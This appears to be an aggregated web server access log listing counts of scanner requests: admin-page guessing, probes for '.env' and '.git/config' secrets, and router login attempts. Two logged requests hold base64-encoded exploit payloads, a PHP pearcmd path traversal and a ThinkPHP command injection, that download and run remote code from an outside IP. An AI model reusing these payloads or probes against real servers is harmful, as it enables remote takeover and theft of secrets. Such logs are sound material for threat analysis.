1	CONNECT	`google[.]com:443`	HTTP/1.1
21	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/CSS/Miniweb.css`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin.asp`	HTTP/1.1
1	GET	`/admin.aspx`	HTTP/1.1
1	GET	`/admin.cfm`	HTTP/1.1
1	GET	`/admin.cgi`	HTTP/1.1
1	GET	`/admin.html`	HTTP/1.1
1	GET	`/admin.jhtml`	HTTP/1.1
1	GET	`/admin.jsa`	HTTP/1.1
1	GET	`/admin.jsp`	HTTP/1.1
1	GET	`/admin.php`	HTTP/1.1
1	GET	`/admin.pl`	HTTP/1.1
1	GET	`/admin.shtml`	HTTP/1.1
1	GET	`/axis2-admin/`	HTTP/1.1
1	GET	`/axis2/`	HTTP/1.1
1	GET	`/axis2/axis2-admin/`	HTTP/1.1
1	GET	`/base.asp`	HTTP/1.1
1	GET	`/base.aspx`	HTTP/1.1
1	GET	`/base.cfm`	HTTP/1.1
1	GET	`/base.cgi`	HTTP/1.1
1	GET	`/base.html`	HTTP/1.1
1	GET	`/base.inc`	HTTP/1.1
1	GET	`/base.jhtml`	HTTP/1.1
1	GET	`/base.jsa`	HTTP/1.1
1	GET	`/base.jsp`	HTTP/1.1
1	GET	`/base.php`	HTTP/1.1
1	GET	`/base.pl`	HTTP/1.1
1	GET	`/base.shtml`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/default.asp`	HTTP/1.1
1	GET	`/default.aspx`	HTTP/1.1
1	GET	`/default.cfm`	HTTP/1.1
1	GET	`/default.cgi`	HTTP/1.1
1	GET	`/default.html`	HTTP/1.1
1	GET	`/default.jhtml`	HTTP/1.1
1	GET	`/default.jsa`	HTTP/1.1
1	GET	`/default.jsp`	HTTP/1.1
1	GET	`/default.php`	HTTP/1.1
1	GET	`/default.pl`	HTTP/1.1
1	GET	`/default.shtml`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
10	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/home.asp`	HTTP/1.1
1	GET	`/home.aspx`	HTTP/1.1
1	GET	`/home.cfm`	HTTP/1.1
1	GET	`/home.cgi`	HTTP/1.1
1	GET	`/home.html`	HTTP/1.1
1	GET	`/home.jhtml`	HTTP/1.1
1	GET	`/home.jsa`	HTTP/1.1
1	GET	`/home.jsp`	HTTP/1.1
1	GET	`/home.php`	HTTP/1.1
1	GET	`/home.pl`	HTTP/1.1
1	GET	`/home.shtml`	HTTP/1.1
1	GET	`/images/.git/HEAD`	HTTP/1.1
1	GET	`/index.asp`	HTTP/1.1
1	GET	`/index.aspx`	HTTP/1.1
1	GET	`/index.cfm`	HTTP/1.1
1	GET	`/index.cgi`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/index.jhtml`	HTTP/1.1
1	GET	`/index.jsa`	HTTP/1.1
1	GET	`/index.jsp`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../tmp/index`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?eval(base64_decode('aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9'));?>+/tmp/index.php`	HTTP/1.1
1	GET	`/index.php?s=/index/ hink`
1	GET	`/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIHwgc2g=\|base64${IFS}-d\|sh`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
1	GET	`/index.pl`	HTTP/1.1
1	GET	`/index.shtml`	HTTP/1.1
1	GET	`/indice.asp`	HTTP/1.1
1	GET	`/indice.aspx`	HTTP/1.1
1	GET	`/indice.cfm`	HTTP/1.1
1	GET	`/indice.cgi`	HTTP/1.1
1	GET	`/indice.html`	HTTP/1.1
1	GET	`/indice.jhtml`	HTTP/1.1
1	GET	`/indice.jsa`	HTTP/1.1
1	GET	`/indice.jsp`	HTTP/1.1
1	GET	`/indice.php`	HTTP/1.1
1	GET	`/indice.pl`	HTTP/1.1
1	GET	`/indice.shtml`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/inicio.asp`	HTTP/1.1
1	GET	`/inicio.aspx`	HTTP/1.1
1	GET	`/inicio.cfm`	HTTP/1.1
1	GET	`/inicio.cgi`	HTTP/1.1
1	GET	`/inicio.html`	HTTP/1.1
1	GET	`/inicio.jhtml`	HTTP/1.1
1	GET	`/inicio.jsa`	HTTP/1.1
1	GET	`/inicio.jsp`	HTTP/1.1
1	GET	`/inicio.php`	HTTP/1.1
1	GET	`/inicio.pl`	HTTP/1.1
1	GET	`/inicio.shtml`	HTTP/1.1
1	GET	`/localstart.asp`	HTTP/1.1
1	GET	`/localstart.aspx`	HTTP/1.1
1	GET	`/localstart.cfm`	HTTP/1.1
1	GET	`/localstart.cgi`	HTTP/1.1
1	GET	`/localstart.html`	HTTP/1.1
1	GET	`/localstart.jhtml`	HTTP/1.1
1	GET	`/localstart.jsa`	HTTP/1.1
1	GET	`/localstart.jsp`	HTTP/1.1
1	GET	`/localstart.php`	HTTP/1.1
1	GET	`/localstart.pl`	HTTP/1.1
1	GET	`/localstart.shtml`	HTTP/1.1
1	GET	`/logs/.git/HEAD`	HTTP/1.1
1	GET	`/main.asp`	HTTP/1.1
1	GET	`/main.aspx`	HTTP/1.1
1	GET	`/main.cfm`	HTTP/1.1
1	GET	`/main.cgi`	HTTP/1.1
1	GET	`/main.html`	HTTP/1.1
1	GET	`/main.jhtml`	HTTP/1.1
1	GET	`/main.jsa`	HTTP/1.1
1	GET	`/main.jsp`	HTTP/1.1
1	GET	`/main.php`	HTTP/1.1
1	GET	`/main.pl`	HTTP/1.1
1	GET	`/main.shtml`	HTTP/1.1
1	GET	`/media/.git/HEAD`	HTTP/1.1
1	GET	`/menu.asp`	HTTP/1.1
1	GET	`/menu.aspx`	HTTP/1.1
1	GET	`/menu.cfm`	HTTP/1.1
1	GET	`/menu.cgi`	HTTP/1.1
1	GET	`/menu.html`	HTTP/1.1
1	GET	`/menu.jhtml`	HTTP/1.1
1	GET	`/menu.jsa`	HTTP/1.1
1	GET	`/menu.jsp`	HTTP/1.1
1	GET	`/menu.php`	HTTP/1.1
1	GET	`/menu.pl`	HTTP/1.1
1	GET	`/menu.shtml`	HTTP/1.1
1	GET	`/nmaplowercheck1707073523`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/public/index.php?s=/index/ hink`
1	GET	`/readme.txt`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/start.asp`	HTTP/1.1
1	GET	`/start.aspx`	HTTP/1.1
1	GET	`/start.cfm`	HTTP/1.1
1	GET	`/start.cgi`	HTTP/1.1
1	GET	`/start.html`	HTTP/1.1
1	GET	`/start.jhtml`	HTTP/1.1
1	GET	`/start.jsa`	HTTP/1.1
1	GET	`/start.jsp`	HTTP/1.1
1	GET	`/start.php`	HTTP/1.1
1	GET	`/start.pl`	HTTP/1.1
1	GET	`/start.shtml`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/utA2`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`default.asp`	HTTP/1.1
2	HEAD	`/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
4	PRI	`*`	HTTP/2.0